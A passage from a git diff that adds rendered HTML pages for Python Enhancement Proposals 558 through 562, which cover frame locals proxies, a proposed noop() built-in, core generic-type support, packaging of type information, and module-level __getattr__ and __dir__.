+        co = f.f_code
+        res = 0
+        if f._locals is NULL:
+            f._locals = {}
+        for index, name in enumerate(co._variable_names):
+            val = f._fast_locals[index]
+            if val is NULL:
+                f._locals.pop(name, None)
+                continue
+            if co._is_cell(offset):
+                if val.cell_contents is NULL:
+                    f._locals.pop(name, None)
+                    continue
+            f._locals[name] = val
+
+    def __len__(self):
+        self._sync_frame_cache()
+        return len(self._locals)
+
+
+

Note: the simplest way to convert the earlier iterations of the PEP 558 +reference implementation into a preliminary implementation of the now proposed +semantics is to remove the frame_cache_updated checks in affected operations, +and instead always sync the frame cache in those methods. Adopting that approach +changes the algorithmic complexity of the following operations as shown (where +n is the number of local and cell variables defined on the frame):

+
+
    +
  • __len__: O(1) -> O(n)
  • +
  • value comparison operations: no longer benefit from O(1) length check shortcut
  • +
  • __iter__: O(1) -> O(n)
  • +
  • __reversed__: O(1) -> O(n)
  • +
  • keys(): O(1) -> O(n)
  • +
  • values(): O(1) -> O(n)
  • +
  • items(): O(1) -> O(n)
  • +
  • popitem(): O(1) -> O(n)
  • +
+
+

The length check and value comparison operations have relatively limited +opportunities for improvement: without allowing usage of a potentially stale +cache, the only way to know how many variables are currently bound is to iterate +over all of them and check, and if the implementation is going to be spending +that many cycles on an operation anyway, it may as well spend it updating the +frame value cache and then consuming the result. These operations are O(n) in +both this PEP and in PEP 667. Customised implementations could be provided that +are faster than updating the frame cache, but it’s far from clear that the +extra code complexity needed to speed these operations up would be worthwhile +when it only offers a linear performance improvement rather than an algorithmic +complexity improvement.

+

The O(1) nature of the other operations can be restored by adding implementation +code that doesn’t rely on the value cache being up to date.

+

Keeping the iterator/iterable retrieval methods as O(1) will involve +writing custom replacements for the corresponding builtin dict helper types, +just as proposed in PEP 667. As illustrated above, the implementations would +be similar to the pseudo-code presented in PEP 667, but not identical (due to +the improved PyEval_GetLocals() interoperability offered by this PEP +affecting the way it stores extra variables).

+

popitem() can be improved from “always O(n)” to “O(n) worst case” by +creating a custom implementation that relies on the improved iteration APIs.

+

To ensure stale frame information is never presented in the Python fast locals +proxy API, these changes in the reference implementation will need to be +implemented before merging.

+

The current implementation at time of writing (2021-10-24) also still stores a +copy of the fast refs mapping on each frame rather than storing a single +instance on the underlying code object (as it still stores cell references +directly, rather than check for cells on each fast locals array access). Fixing +this would also be required before merging.

+
+
+
+

Implementation

+

The reference implementation update is in development as a draft pull +request on GitHub ([6]).

+
+
+

Acknowledgements

+

Thanks to Nathaniel J. Smith for proposing the write-through proxy idea in +[1] and pointing out some critical design flaws in earlier iterations of the +PEP that attempted to avoid introducing such a proxy.

+

Thanks to Steve Dower and Petr Viktorin for asking that more attention be paid +to the developer experience of the proposed C API additions [8] [13].

+

Thanks to Larry Hastings for the suggestion on how to use enums in the stable +ABI while ensuring that they safely support typecasting from arbitrary +integers.

+

Thanks to Mark Shannon for pushing for further simplification of the C level +API and semantics, as well as significant clarification of the PEP text (and for +restarting discussion on the PEP in early 2021 after a further year of +inactivity) [10] [11] [12]. Mark’s comments that were ultimately published as +PEP 667 also directly resulted in several implementation efficiency improvements +that avoid incurring the cost of redundant O(n) mapping refresh operations +when the relevant mappings aren’t used, as well as the change to ensure that +the state reported through the Python level f_locals API is never stale.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0558.rst

+

Last modified: 2024-08-05 03:54:25 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0559/index.html b/pep-0559/index.html new file mode 100644 index 00000000000..bee48914099 --- /dev/null +++ b/pep-0559/index.html @@ -0,0 +1,212 @@ + + + + + + + + PEP 559 – Built-in noop() | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 559 – Built-in noop()

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
08-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
09-Sep-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding a new built-in function called noop() which does +nothing but return None.

+
+
+

Rationale

+

It is trivial to implement a no-op function in Python. It’s so easy in fact +that many people do it many times over and over again. It would be useful in +many cases to have a common built-in function that does nothing.

+

One use case would be for PEP 553, where you could set the breakpoint +environment variable to the following in order to effectively disable it:

+
$ setenv PYTHONBREAKPOINT=noop
+
+
+
+
+

Implementation

+

The Python equivalent of the noop() function is exactly:

+
def noop(*args, **kws):
+    return None
+
+
+

The C built-in implementation is available as a pull request [1].

+
+
+

Rejected alternatives

+
+

noop() returns something

+

YAGNI.

+

This is rejected because it complicates the semantics. For example, if you +always return both *args and **kws, what do you return when none of +those are given? Returning a tuple of ((), {}) is kind of ugly, but +provides consistency. But you might also want to just return None since +that’s also conceptually what the function was passed.

+

Or, what if you pass in exactly one positional argument, e.g. noop(7). Do +you return 7 or ((7,), {})? And so on.

+

The author claims that you won’t ever need the return value of noop() so +it will always return None.

+

Coghlan’s Dialogs (edited for formatting):

+
+
My counterargument to this would be map(noop, iterable), +sorted(iterable, key=noop), etc. (filter, max, and +min all accept callables that accept a single argument, as do +many of the itertools operations).

Making noop() a useful default function in those cases just +needs the definition to be:

+
def noop(*args, **kwds):
+    return args[0] if args else None
+
+
+

The counterargument to the counterargument is that using None +as the default in all these cases is going to be faster, since it +lets the algorithm skip the callback entirely, rather than calling +it and having it do nothing useful.

+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0559.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0560/index.html b/pep-0560/index.html new file mode 100644 index 00000000000..8a9304f77f8 --- /dev/null +++ b/pep-0560/index.html @@ -0,0 +1,458 @@ + + + + + + + + PEP 560 – Core support for typing module and generic types | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 560 – Core support for typing module and generic types

+
+
Author:
+
Ivan Levkivskyi <levkivskyi at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
03-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
09-Sep-2017, 14-Nov-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at the documentation for +__class_getitem__() and +__mro_entries__().

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Initially PEP 484 was designed in such way that it would not introduce +any changes to the core CPython interpreter. Now type hints and +the typing module are extensively used by the community, e.g. PEP 526 +and PEP 557 extend the usage of type hints, and the backport of typing +on PyPI has 1M downloads/month. Therefore, this restriction can be removed. +It is proposed to add two special methods __class_getitem__ and +__mro_entries__ to the core CPython for better support of +generic types.

+
+
+

Rationale

+

The restriction to not modify the core CPython interpreter led to some +design decisions that became questionable when the typing module started +to be widely used. There are three main points of concern: +performance of the typing module, metaclass conflicts, and the large +number of hacks currently used in typing.

+
+

Performance

+

The typing module is one of the heaviest and slowest modules in +the standard library even with all the optimizations made. Mainly this is +because subscripted generic types (see PEP 484 for definition of terms used +in this PEP) are class objects (see also [1]). There are three main ways how +the performance can be improved with the help of the proposed special methods:

+
    +
  • Creation of generic classes is slow since the GenericMeta.__new__ is +very slow; we will not need it anymore.
  • +
  • Very long method resolution orders (MROs) for generic classes will be +half as long; they are present because we duplicate the collections.abc +inheritance chain in typing.
  • +
  • Instantiation of generic classes will be faster (this is minor however).
  • +
+
+
+

Metaclass conflicts

+

All generic types are instances of GenericMeta, so if a user uses +a custom metaclass, then it is hard to make a corresponding class generic. +This is particularly hard for library classes that a user doesn’t control. +A workaround is to always mix-in GenericMeta:

+
class AdHocMeta(GenericMeta, LibraryMeta):
+    pass
+
+class UserClass(LibraryBase, Generic[T], metaclass=AdHocMeta):
+    ...
+
+
+

but this is not always practical or even possible. With the help of the +proposed special attributes the GenericMeta metaclass will not be needed.

+
+
+

Hacks and bugs that will be removed by this proposal

+
    +
  • _generic_new hack that exists because __init__ is not called on +instances with a type differing from the type whose __new__ was called, +C[int]().__class__ is C.
  • +
  • _next_in_mro speed hack will be not necessary since subscription will +not create new classes.
  • +
  • Ugly sys._getframe hack. This one is particularly nasty since it looks +like we can’t remove it without changes outside typing.
  • +
  • Currently generics do dangerous things with private ABC caches +to fix large memory consumption that grows at least as O(N2), +see [2]. This point is also important because it was recently proposed to +re-implement ABCMeta in C.
  • +
  • Problems with sharing attributes between subscripted generics, +see [3]. The current solution already uses __getattr__ and __setattr__, +but it is still incomplete, and solving this without the current proposal +will be hard and will need __getattribute__.
  • +
  • _no_slots_copy hack, where we clean up the class dictionary on every +subscription thus allowing generics with __slots__.
  • +
  • General complexity of the typing module. The new proposal will not +only allow to remove the above-mentioned hacks/bugs, but also simplify +the implementation, so that it will be easier to maintain.
  • +
+
+
+
+

Specification

+
+

__class_getitem__

+

The idea of __class_getitem__ is simple: it is an exact analog of +__getitem__ with an exception that it is called on a class that +defines it, not on its instances. This allows us to avoid +GenericMeta.__getitem__ for things like Iterable[int]. +The __class_getitem__ is automatically a class method and +does not require @classmethod decorator (similar to +__init_subclass__) and is inherited like normal attributes. +For example:

+
class MyList:
+    def __getitem__(self, index):
+        return index + 1
+    def __class_getitem__(cls, item):
+        return f"{cls.__name__}[{item.__name__}]"
+
+class MyOtherList(MyList):
+    pass
+
+assert MyList()[0] == 1
+assert MyList[int] == "MyList[int]"
+
+assert MyOtherList()[0] == 1
+assert MyOtherList[int] == "MyOtherList[int]"
+
+
+

Note that this method is used as a fallback, so if a metaclass defines +__getitem__, then that will have the priority.

+
+
+

__mro_entries__

+

If an object that is not a class object appears in the tuple of bases of +a class definition, then method __mro_entries__ is searched on it. +If found, it is called with the original tuple of bases as an argument. +The result of the call must be a tuple, that is unpacked in the base classes +in place of this object. (If the tuple is empty, this means that the original +bases is simply discarded.) If there are more than one object with +__mro_entries__, then all of them are called with the same original tuple +of bases. This step happens first in the process of creation of a class, +all other steps, including checks for duplicate bases and MRO calculation, +happen normally with the updated bases.

+

Using the method API instead of just an attribute is necessary to avoid +inconsistent MRO errors, and perform other manipulations that are currently +done by GenericMeta.__new__. The original bases are stored as +__orig_bases__ in the class namespace (currently this is also done by +the metaclass). For example:

+
class GenericAlias:
+    def __init__(self, origin, item):
+        self.origin = origin
+        self.item = item
+    def __mro_entries__(self, bases):
+        return (self.origin,)
+
+class NewList:
+    def __class_getitem__(cls, item):
+        return GenericAlias(cls, item)
+
+class Tokens(NewList[int]):
+    ...
+
+assert Tokens.__bases__ == (NewList,)
+assert Tokens.__orig_bases__ == (NewList[int],)
+assert Tokens.__mro__ == (Tokens, NewList, object)
+
+
+

Resolution using __mro_entries__ happens only in bases of a class +definition statement. In all other situations where a class object is +expected, no such resolution will happen, this includes isinstance +and issubclass built-in functions.

+

NOTE: These two method names are reserved for use by the typing module +and the generic types machinery, and any other use is discouraged. +The reference implementation (with tests) can be found in [4], and +the proposal was originally posted and discussed on the typing tracker, +see [5].

+
+
+

Dynamic class creation and types.resolve_bases

+

type.__new__ will not perform any MRO entry resolution. So that a direct +call type('Tokens', (List[int],), {}) will fail. This is done for +performance reasons and to minimize the number of implicit transformations. +Instead, a helper function resolve_bases will be added to +the types module to allow an explicit __mro_entries__ resolution in +the context of dynamic class creation. Correspondingly, types.new_class +will be updated to reflect the new class creation steps while maintaining +the backwards compatibility:

+
def new_class(name, bases=(), kwds=None, exec_body=None):
+    resolved_bases = resolve_bases(bases)  # This step is added
+    meta, ns, kwds = prepare_class(name, resolved_bases, kwds)
+    if exec_body is not None:
+        exec_body(ns)
+    ns['__orig_bases__'] = bases  # This step is added
+    return meta(name, resolved_bases, ns, **kwds)
+
+
+
+
+

Using __class_getitem__ in C extensions

+

As mentioned above, __class_getitem__ is automatically a class method +if defined in Python code. To define this method in a C extension, one +should use flags METH_O|METH_CLASS. For example, a simple way to make +an extension class generic is to use a method that simply returns the +original class objects, thus fully erasing the type information at runtime, +and deferring all check to static type checkers only:

+
typedef struct {
+    PyObject_HEAD
+    /* ... your code ... */
+} SimpleGeneric;
+
+static PyObject *
+simple_class_getitem(PyObject *type, PyObject *item)
+{
+    Py_INCREF(type);
+    return type;
+}
+
+static PyMethodDef simple_generic_methods[] = {
+    {"__class_getitem__", simple_class_getitem, METH_O|METH_CLASS, NULL},
+    /* ... other methods ... */
+};
+
+PyTypeObject SimpleGeneric_Type = {
+    PyVarObject_HEAD_INIT(NULL, 0)
+    "SimpleGeneric",
+    sizeof(SimpleGeneric),
+    0,
+    .tp_flags = Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE,
+    .tp_methods = simple_generic_methods,
+};
+
+
+

Such class can be used as a normal generic in Python type annotations +(a corresponding stub file should be provided for static type checkers, +see PEP 484 for details):

+
from simple_extension import SimpleGeneric
+from typing import TypeVar
+
+T = TypeVar('T')
+
+Alias = SimpleGeneric[str, T]
+class SubClass(SimpleGeneric[T, int]):
+    ...
+
+data: Alias[int]  # Works at runtime
+more_data: SubClass[str]  # Also works at runtime
+
+
+
+
+
+

Backwards compatibility and impact on users who don’t use typing

+

This proposal may break code that currently uses the names +__class_getitem__ and __mro_entries__. (But the language +reference explicitly reserves all undocumented dunder names, and +allows “breakage without warning”; see [6].)

+

This proposal will support almost complete backwards compatibility with +the current public generic types API; moreover the typing module is still +provisional. The only two exceptions are that currently +issubclass(List[int], List) returns True, while with this proposal it will +raise TypeError, and repr() of unsubscripted user-defined generics +cannot be tweaked and will coincide with repr() of normal (non-generic) +classes.

+

With the reference implementation I measured negligible performance effects +(under 1% on a micro-benchmark) for regular (non-generic) classes. At the same +time performance of generics is significantly improved:

+
    +
  • importlib.reload(typing) is up to 7x faster
  • +
  • Creation of user defined generic classes is up to 4x faster (on a +micro-benchmark with an empty body)
  • +
  • Instantiation of generic classes is up to 5x faster (on a micro-benchmark +with an empty __init__)
  • +
  • Other operations with generic types and instances (like method lookup and +isinstance() checks) are improved by around 10-20%
  • +
  • The only aspect that gets slower with the current proof of concept +implementation is the subscripted generics cache look-up. However it was +already very efficient, so this aspect gives negligible overall impact.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0560.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0561/index.html b/pep-0561/index.html new file mode 100644 index 00000000000..e8c15fe6fa9 --- /dev/null +++ b/pep-0561/index.html @@ -0,0 +1,507 @@ + + + + + + + + PEP 561 – Distributing and Packaging Type Information | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 561 – Distributing and Packaging Type Information

+
+
Author:
+
Ethan Smith <ethan at ethanhs.me>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging, Typing
+
Created:
+
09-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
10-Sep-2017, 12-Sep-2017, 06-Oct-2017, 26-Oct-2017, 12-Apr-2018
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Type information in libraries for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

PEP 484 introduced type hinting to Python, with goals of making typing +gradual and easy to adopt. Currently, typing information must be distributed +manually. This PEP provides a standardized means to leverage existing tooling +to package and distribute type information with minimal work and an ordering +for type checkers to resolve modules and collect this information for type +checking.

+
+
+

Rationale

+

Currently, package authors wish to distribute code that has inline type +information. Additionally, maintainers would like to distribute stub files +to keep Python 2 compatibility while using newer annotation syntax. However, +there is no standard method to distribute packages with type information. +Also, if one wished to ship stub files privately the only method available +would be via setting MYPYPATH or the equivalent to manually point to +stubs. If the package can be released publicly, it can be added to +typeshed [1]. However, this does not scale and becomes a burden on the +maintainers of typeshed. In addition, it ties bug fixes in stubs to releases +of the tool using typeshed.

+

PEP 484 has a brief section on distributing typing information. In this +section +the PEP recommends using shared/typehints/pythonX.Y/ for +shipping stub files. However, manually adding a path to stub files for each +third party library does not scale. The simplest approach people have taken +is to add site-packages to their MYPYPATH, but this causes type +checkers to fail on packages that are highly dynamic (e.g. sqlalchemy +and Django).

+
+
+

Definition of Terms

+

The definition of “MAY”, “MUST”, and “SHOULD”, and “SHOULD NOT” are +to be interpreted as described in RFC 2119.

+

“inline” - the types are part of the runtime code using PEP 526 and +PEP 3107 syntax (the filename ends in .py).

+

“stubs” - files containing only type information, empty of runtime code +(the filename ends in .pyi).

+

“Distributions” are the packaged files which are used to publish and distribute +a release. (PEP 426)

+

“Module” a file containing Python runtime code or stubbed type information.

+

“Package” a directory or directories that namespace Python modules. +(Note the distinction between packages and distributions. While most +distributions are named after the one package they install, some +distributions install multiple packages.)

+
+
+

Specification

+

There are several motivations and methods of supporting typing in a package. +This PEP recognizes three types of packages that users of typing wish to +create:

+
    +
  1. The package maintainer would like to add type information inline.
  2. +
  3. The package maintainer would like to add type information via stubs.
  4. +
  5. A third party or package maintainer would like to share stub files for +a package, but the maintainer does not want to include them in the source +of the package.
  6. +
+

This PEP aims to support all three scenarios and make them simple to add to +packaging and deployment.

+

The two major parts of this specification are the packaging specifications +and the resolution order for resolving module type information. The type +checking spec is meant to replace the shared/typehints/pythonX.Y/ +spec of PEP 484.

+

New third party stub libraries SHOULD distribute stubs via the third party +packaging methods proposed in this PEP in place of being added to typeshed. +Typeshed will remain in use, but if maintainers are found, third party stubs +in typeshed MAY be split into their own package.

+
+

Packaging Type Information

+

In order to make packaging and distributing type information as simple and +easy as possible, packaging and distribution is done through existing +frameworks.

+

Package maintainers who wish to support type checking of their code MUST add +a marker file named py.typed to their package supporting typing. This marker applies +recursively: if a top-level package includes it, all its sub-packages MUST support +type checking as well. To have this file installed with the package, +maintainers can use existing packaging options such as package_data in +distutils, shown below.

+

Distutils option example:

+
setup(
+    ...,
+    package_data = {
+        'foopkg': ['py.typed'],
+    },
+    ...,
+    )
+
+
+

For namespace packages (see PEP 420), the py.typed file should be in the +submodules of the namespace, to avoid conflicts and for clarity.

+

This PEP does not support distributing typing information as part of +module-only distributions or single-file modules within namespace packages.

+

The single-file module should be refactored into a package +and indicate that the package supports typing as described +above.

+
+

Stub-only Packages

+

For package maintainers wishing to ship stub files containing all of their +type information, it is preferred that the *.pyi stubs are alongside the +corresponding *.py files. However, the stubs can also be put in a separate +package and distributed separately. Third parties can also find this method +useful if they wish to distribute stub files. The name of the stub package +MUST follow the scheme foopkg-stubs for type stubs for the package named +foopkg. Note that for stub-only packages adding a py.typed marker is not +needed since the name *-stubs is enough to indicate it is a source of typing +information.

+

Third parties seeking to distribute stub files are encouraged to contact the +maintainer of the package about distribution alongside the package. If the +maintainer does not wish to maintain or package stub files or type information +inline, then a third party stub-only package can be created.

+

In addition, stub-only distributions SHOULD indicate which version(s) +of the runtime package are supported by indicating the runtime distribution’s +version(s) through normal dependency data. For example, the +stub package flyingcircus-stubs can indicate the versions of the +runtime flyingcircus distribution it supports through install_requires +in distutils-based tools, or the equivalent in other packaging tools. Note that +in pip 9.0, if you update flyingcircus-stubs, it will update +flyingcircus. In pip 9.0, you can use the +--upgrade-strategy=only-if-needed flag. In pip 10.0 this is the default +behavior.

+

For namespace packages (see PEP 420), stub-only packages should +use the -stubs suffix on only the root namespace package. +All stub-only namespace packages should omit __init__.pyi files. py.typed +marker files are not necessary for stub-only packages, but similarly +to packages with inline types, if used, they should be in submodules of the namespace to +avoid conflicts and for clarity.

+

For example, if the pentagon and hexagon are separate distributions +installing within the namespace package shapes.polygons +The corresponding types-only distributions should produce packages +laid out as follows:

+
shapes-stubs
+└── polygons
+    └── pentagon
+        └── __init__.pyi
+
+shapes-stubs
+└── polygons
+    └── hexagon
+        └── __init__.pyi
+
+
+
+
+
+

Type Checker Module Resolution Order

+

The following is the order in which type checkers supporting this PEP SHOULD +resolve modules containing type information:

+
    +
  1. Stubs or Python source manually put in the beginning of the path. Type +checkers SHOULD provide this to allow the user complete control of which +stubs to use, and to patch broken stubs/inline types from packages. +In mypy the $MYPYPATH environment variable can be used for this.
  2. +
  3. User code - the files the type checker is running on.
  4. +
  5. Stub packages - these packages SHOULD supersede any installed inline +package. They can be found at foopkg-stubs for package foopkg.
  6. +
  7. Packages with a py.typed marker file - if there is nothing overriding +the installed package, and it opts into type checking, the types +bundled with the package SHOULD be used (be they in .pyi type +stub files or inline in .py files).
  8. +
  9. Typeshed (if used) - Provides the stdlib types and several third party +libraries.
  10. +
+

If typecheckers identify a stub-only namespace package without the desired module +in step 3, they should continue to step 4/5. Typecheckers should identify namespace packages +by the absence of __init__.pyi. This allows different subpackages to +independently opt for inline vs stub-only.

+

Type checkers that check a different Python version than the version they run +on MUST find the type information in the site-packages/dist-packages +of that Python version. This can be queried e.g. +pythonX.Y -c 'import site; print(site.getsitepackages())'. It is also recommended +that the type checker allow for the user to point to a particular Python +binary, in case it is not in the path.

+
+
+

Partial Stub Packages

+

Many stub packages will only have part of the type interface for libraries +completed, especially initially. For the benefit of type checking and code +editors, packages can be “partial”. This means modules not found in the stub +package SHOULD be searched for in parts four and five of the module resolution +order above, namely inline packages and typeshed.

+

Type checkers should merge the stub package and runtime package or typeshed +directories. This can be thought of as the functional equivalent of copying the +stub package into the same directory as the corresponding runtime package or +typeshed folder and type checking the combined directory structure. Thus type +checkers MUST maintain the normal resolution order of checking *.pyi before +*.py files.

+

If a stub package distribution is partial it MUST include partial\n in a +py.typed file. For stub-packages distributing within a namespace +package (see PEP 420), the py.typed file should be in the +submodules of the namespace.

+

Type checkers should treat namespace packages within stub-packages as +incomplete since multiple distributions may populate them. +Regular packages within namespace packages in stub-package distributions +are considered complete unless a py.typed with partial\n is included.

+
+
+
+

Implementation

+

The proposed scheme of indicating support for typing is completely backwards +compatible, and requires no modification to package tooling. A sample package +with inline types is available [typed_package], as well as a [stub_package]. A +sample package checker [pkg_checker] which reads the metadata of installed +packages and reports on their status as either not typed, inline typed, or a +stub package.

+

The mypy type checker has an implementation of PEP 561 searching which can be +read about in the mypy docs [4].

+

[numpy-stubs] is an example of a real stub-only package for the numpy +distribution.

+
+
+

Acknowledgements

+

This PEP would not have been possible without the ideas, feedback, and support +of Ivan Levkivskyi, Jelle Zijlstra, Alyssa Coghlan, Daniel F Moisset, Andrey +Vlasovskikh, Nathaniel Smith, and Guido van Rossum.

+
+
+

Version History

+
    +
  • 2023-01-13
    +
      +
    • Clarify that the 4th step of the Module Resolution Order applies +to any package with a py.typed marker file (and not just +inline packages).
    • +
    +
    +
  • +
  • 2021-09-20
    +
      +
    • Clarify expectations and typechecker behavior for stub-only namespace packages
    • +
    • Clarify handling of single-file modules within namespace packages.
    • +
    +
    +
  • +
  • 2018-07-09
    +
      +
    • Add links to sample stub-only packages
    • +
    +
    +
  • +
  • 2018-06-19
    +
      +
    • Partial stub packages can look at typeshed as well as runtime packages
    • +
    +
    +
  • +
  • 2018-05-15
    +
      +
    • Add partial stub package spec.
    • +
    +
    +
  • +
  • 2018-04-09
    +
      +
    • Add reference to mypy implementation
    • +
    • Clarify stub package priority.
    • +
    +
    +
  • +
  • 2018-02-02
    +
      +
    • Change stub-only package suffix to be -stubs not _stubs.
    • +
    • Note that py.typed is not needed for stub-only packages.
    • +
    • Add note about pip and upgrading stub packages.
    • +
    +
    +
  • +
  • 2017-11-12
    +
      +
    • Rewritten to use existing tooling only
    • +
    • No need to indicate kind of type information in metadata
    • +
    • Name of marker file changed from .typeinfo to py.typed
    • +
    +
    +
  • +
  • 2017-11-10
    +
      +
    • Specification re-written to use package metadata instead of distribution +metadata.
    • +
    • Removed stub-only packages and merged into third party packages spec.
    • +
    • Removed suggestion for typecheckers to consider checking runtime versions
    • +
    • Implementations updated to reflect PEP changes.
    • +
    +
    +
  • +
  • 2017-10-26
    +
      +
    • Added implementation references.
    • +
    • Added acknowledgements and version history.
    • +
    +
    +
  • +
  • 2017-10-06
    +
      +
    • Rewritten to use .distinfo/METADATA over a distutils specific command.
    • +
    • Clarify versioning of third party stub packages.
    • +
    +
    +
  • +
  • 2017-09-11
    +
      +
    • Added information about current solutions and typeshed.
    • +
    • Clarify rationale.
    • +
    +
    +
  • +
+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0561.rst

+

Last modified: 2024-06-05 15:44:49 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0562/index.html b/pep-0562/index.html new file mode 100644 index 00000000000..e4aa9d8fe54 --- /dev/null +++ b/pep-0562/index.html @@ -0,0 +1,318 @@ + + + + + + + + PEP 562 – Module __getattr__ and __dir__ | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 562 – Module __getattr__ and __dir__

+
+
Author:
+
Ivan Levkivskyi <levkivskyi at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
09-Sep-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Customizing Module Attribute Access.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

It is proposed to support __getattr__ and __dir__ function defined +on modules to provide basic customization of module attribute access.

+
+
+

Rationale

+

It is sometimes convenient to customize or otherwise have control over +access to module attributes. A typical example is managing deprecation +warnings. Typical workarounds are assigning __class__ of a module object +to a custom subclass of types.ModuleType or replacing the sys.modules +item with a custom wrapper instance. It would be convenient to simplify this +procedure by recognizing __getattr__ defined directly in a module that +would act like a normal __getattr__ method, except that it will be defined +on module instances. For example:

+
# lib.py
+
+from warnings import warn
+
+deprecated_names = ["old_function", ...]
+
+def _deprecated_old_function(arg, other):
+    ...
+
+def __getattr__(name):
+    if name in deprecated_names:
+        warn(f"{name} is deprecated", DeprecationWarning)
+        return globals()[f"_deprecated_{name}"]
+    raise AttributeError(f"module {__name__!r} has no attribute {name!r}")
+
+# main.py
+
+from lib import old_function  # Works, but emits the warning
+
+
+

Another widespread use case for __getattr__ would be lazy submodule +imports. Consider a simple example:

+
# lib/__init__.py
+
+import importlib
+
+__all__ = ['submod', ...]
+
+def __getattr__(name):
+    if name in __all__:
+        return importlib.import_module("." + name, __name__)
+    raise AttributeError(f"module {__name__!r} has no attribute {name!r}")
+
+# lib/submod.py
+
+print("Submodule loaded")
+class HeavyClass:
+    ...
+
+# main.py
+
+import lib
+lib.submod.HeavyClass  # prints "Submodule loaded"
+
+
+

There is a related proposal PEP 549 that proposes to support instance +properties for a similar functionality. The difference is this PEP proposes +a faster and simpler mechanism, but provides more basic customization. +An additional motivation for this proposal is that PEP 484 already defines +the use of module __getattr__ for this purpose in Python stub files, +see PEP 484.

+

In addition, to allow modifying result of a dir() call on a module +to show deprecated and other dynamically generated attributes, it is +proposed to support module level __dir__ function. For example:

+
# lib.py
+
+deprecated_names = ["old_function", ...]
+__all__ = ["new_function_one", "new_function_two", ...]
+
+def new_function_one(arg, other):
+   ...
+def new_function_two(arg, other):
+    ...
+
+def __dir__():
+    return sorted(__all__ + deprecated_names)
+
+# main.py
+
+import lib
+
+dir(lib)  # prints ["new_function_one", "new_function_two", "old_function", ...]
+
+
+
+
+

Specification

+

The __getattr__ function at the module level should accept one argument +which is the name of an attribute and return the computed value or raise +an AttributeError:

+
def __getattr__(name: str) -> Any: ...
+
+
+

If an attribute is not found on a module object through the normal lookup +(i.e. object.__getattribute__), then __getattr__ is searched in +the module __dict__ before raising an AttributeError. If found, it is +called with the attribute name and the result is returned. Looking up a name +as a module global will bypass module __getattr__. This is intentional, +otherwise calling __getattr__ for builtins will significantly harm +performance.

+

The __dir__ function should accept no arguments, and return +a list of strings that represents the names accessible on module:

+
def __dir__() -> List[str]: ...
+
+
+

If present, this function overrides the standard dir() search on +a module.

+

The reference implementation for this PEP can be found in [2].

+
+
+

Backwards compatibility and impact on performance

+

This PEP may break code that uses module level (global) names __getattr__ +and __dir__. (But the language reference explicitly reserves all +undocumented dunder names, and allows “breakage without warning”; see [3].) +The performance implications of this PEP are minimal, since __getattr__ +is called only for missing attributes.

+

Some tools that perform module attributes discovery might not expect +__getattr__. This problem is not new however, since it is already possible +to replace a module with a module subclass with overridden __getattr__ and +__dir__, but with this PEP such problems can occur more often.

+
+
+

Discussion

+

Note that the use of module __getattr__ requires care to keep the referred +objects pickleable. For example, the __name__ attribute of a function +should correspond to the name with which it is accessible via +__getattr__:

+
def keep_pickleable(func):
+    func.__name__ = func.__name__.replace('_deprecated_', '')
+    func.__qualname__ = func.__qualname__.replace('_deprecated_', '')
+    return func
+
+@keep_pickleable
+def _deprecated_old_function(arg, other):
+    ...
+
+
+

One should be also careful to avoid recursion as one would do with +a class level __getattr__.

+

To use a module global with triggering __getattr__ (for example if one +wants to use a lazy loaded submodule) one can access it as:

+
sys.modules[__name__].some_global
+
+
+

or as:

+
from . import some_global
+
+
+

Note that the latter sets the module attribute, thus __getattr__ will be +called only once.

+
+
+

References

+ +
+ +
+
+

